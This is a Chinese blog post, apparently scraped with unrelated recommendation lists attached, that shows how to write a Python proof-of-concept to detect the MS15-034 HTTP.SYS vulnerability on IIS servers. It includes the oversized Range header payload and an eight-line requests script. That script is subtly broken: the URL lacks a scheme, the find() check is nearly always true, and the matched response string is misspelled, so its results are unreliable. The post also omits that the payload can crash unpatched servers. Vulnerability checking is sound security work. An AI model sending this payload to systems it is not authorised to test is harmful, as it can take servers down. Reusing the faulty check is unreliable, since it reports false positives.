python漏洞扫描器编写,用Python编写Web漏洞检测工具
作为单位的网络安全管理员,经常会遇到这样的情况,某些漏洞在互联网上被批露后,在用的扫描工具却无法及时集成。
遇到这种情况,领导会说:“自己想办法,抓紧检测是否有这个漏洞。”很多人会告诉你可以用自行编写Poc这个方法,指的就是根据漏洞的简单原理写出对应的漏洞检测代码,用来验证漏洞是否存在。那么如何编写Poc呢?可能你会把它想象的无比困难。
Python的出现,极大简化了Poc的编写过程,我们不需要再把时间浪费在网络连接、发送HTTP数据等繁琐的杂事上。以15年打击面最广的“HTTP.SYS远程执行代码漏洞”(ms15-034)为例,编写Poc只需要两个步骤。
第一步:简单了解漏洞触发机制
在网上可以搜索到,这个漏洞触发机制就是:使用IIS作为WEB容器可能存在编号为MS-15034的远程代码执行漏洞,可以发送测试代码,若返回“Requested Range Not Satisfiable”则证明存在此漏洞。
下面就是被公布的测试代码:
Host: stuff
Range: bytes=0-" + hexAllFfff
简单来说,要验证是否存在漏洞,只要把测试代码发送到目标服务器上,进行验证即可,而这就是利用Python编写Web漏洞检测工具(Poc)的过程。
第二步:用Python编写漏洞检测具体代码
代码只有8行,我进行了详细注释,直接贴出来。
import requests # 发送web请求所需的库
url = '127.0.0.1' # 需要测试的服务器IP
payload = {'Host':'stuff','Range':'bytes=0-18446744073709551615'} # 测试代码
r1 = requests.get(url, headers=payload) #发送测试代码
if str(r1.content).find('Requested Range Not Satisfialbe'): # 检查返回结果
print('{}有ms15-034漏洞'.format(url))
else:
print('{}不存在ms15-034漏洞'.format(url))
简单两步加上8行代码,就完成了一个ms15-034漏洞检测工具。当然,实际应用还有很多需要完善的地方,那就自己动手吧
python漏洞扫描器编写,用Python编写Web漏洞检测工具相关推荐
- 网络设备Web登录检测工具device-phamer
网络设备Web登录检测工具device-phamer 为了便于管理和维护,大部分网络都提供了Web管理接口.Kali Linux提供了一款专用检测工具device-phamer.该工具可以批量检测IP ...
- web服务器检测工具
简介: servicemonitor可以帮助用户自动监视Web服务器是否正常,是一个非常实用且专业的web服务器检测工具,能够及时发现iframe,script等异常代码被加入网页,及时发现服务器当机 ...
- python病毒扫描器_基于Python的病毒扫描机制
构建集中式病毒扫描机制(ClamAV) Clam AntiVirus(ClamAV)是一款免费而且开源的防毒软件,软件与病毒库的更新皆有社区免费发布,官网地址:http://www.clamav.ne ...
- WEB渗透漏洞扫描【2】椰树Web漏洞扫描器(2)
1.扫描工具图如下,操作也很简单. 2.具体操作: 3.以后如果实战使用,记录一次使用的实例.
- 小陈WEB漏洞扫描器 V2.0
小陈WEB漏洞扫描器 V2.0 小陈WEB漏洞扫描器 V2.0 https://pan.baidu.com/s/1NSmFCyxowEa3YlOuhvtwwQ 转载于:https://www.cnbl ...
- 网络 /Web漏洞扫描
目录 网络漏洞扫描 OpenVAS 的安装 OpenVAS 的使⽤ Web 漏洞扫描 AWVS AWVS 的使⽤: 创建扫描⽬标 创建扫描任务 开启扫描任务 导出扫描报告 通过网络漏洞扫描,全面掌握目 ...
- python的web压力测试工具-pylot安装使用
pylot是python编写的一款web压力测试工具.使用比较简单.而且测试结果相对稳定. 这里不得不鄙视一下apache 的ab测试,那结果真是让人蛋疼,同样的url,测试结果飘忽不定,看得人心惊肉 ...
- 主流WEB漏洞扫描器种类及其指纹特征分析
文章来源于信安旅途 Tips 文章最下方有小礼品噢~ 看完文章先嘛~ 0x01 Web漏洞扫描器 国内: 绿盟(WVSS):https://www.nsfocus.com.cn/html/2019/2 ...
- Web漏洞扫描工具(批量脱壳、反序列化、CMS)
一.什么是Web漏洞扫描工具 即是指"扫描Web应用以查找安全漏洞(如跨站脚本,SQL注入,命令执行,目录遍历和不安全服务器配置)的自动化工具",其中许多可能是由不安全或不正确的编 ...
- 网络安全自学篇之Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具
前言: Web渗透技术的核心是发现Web漏洞,发现漏洞有手工和软件自动化扫描两种方式.对于用户验证漏洞.用户凭证管理问题.权限特权及访问控制漏洞.缓存漏洞.跨站脚本漏洞.加密漏洞.路径切换漏洞.代码注 ...
最新文章
- python能做什么
- Thinkphp怎样修改模板标签定界符
- linux gcc 内联汇编入门
- SharedActivityContext要引用那个单元?
- mysql索引空间配置_加入空间mysql索引
- Github上影响力最大的十位Pythoner
- xshell更改背景颜色,解决乱码问题及更改字体及字体大小
- centos7优先wifi连接_WIFI明明已连接,但却无法上网,问题究竟出现在哪里?
- PAT乙级1030 完美数列 (25 分)
- 热点|国家动物健康与食品安全创新联盟成立科技创新赋能委员会 并首发动物源食品信任追溯平台...
- Mathematic的学习打卡day 8
- java中如何实例化一个接口_「实例化」java之接口实例化 - seo实验室
- linux配置4g网络命令_[4G]Linux平台上实现4G通信
- 基于FPGA的Yolov4 tiny目标检测网络加速器
- idea设置author注解
- 如何精确计算 LoRaWAN 终端电池寿命
- 计算机编程辅导班,昆明少儿计算机编程辅导班
- 未来可能的安全焦点:GIS地理信息系统安全问题分析
- 家里用服务器放在哪个位置,家用路由器放在什么位置比较合理?
- imx6ul uart8路串口调试(代码)
热门文章
- Pojo、Po、Vo、Dto的含义
- java用dockerfile生成镜像_【HAVENT原创】创建 Dockerfile 生成新的镜像,并发布到 DockerHub...
- js rsa验签_【HAVENT原创】前端使用 jsrsasign 进行 RSA 加密、解密、签名、验签
- Kafka报错:Couldn't find leaders for Set
- python批量写入经纬度
- 【目标检测】SPP-Net论文理解(超详细版本)
- 计算机word插图教案,《在Word中插入图片》优秀教学设计范文
- 服务器信息批量收集,如何批量导入或导出服务器信息
- python 循环十次_python循环10次怎么写
- 中英文双语切换小程序开发制作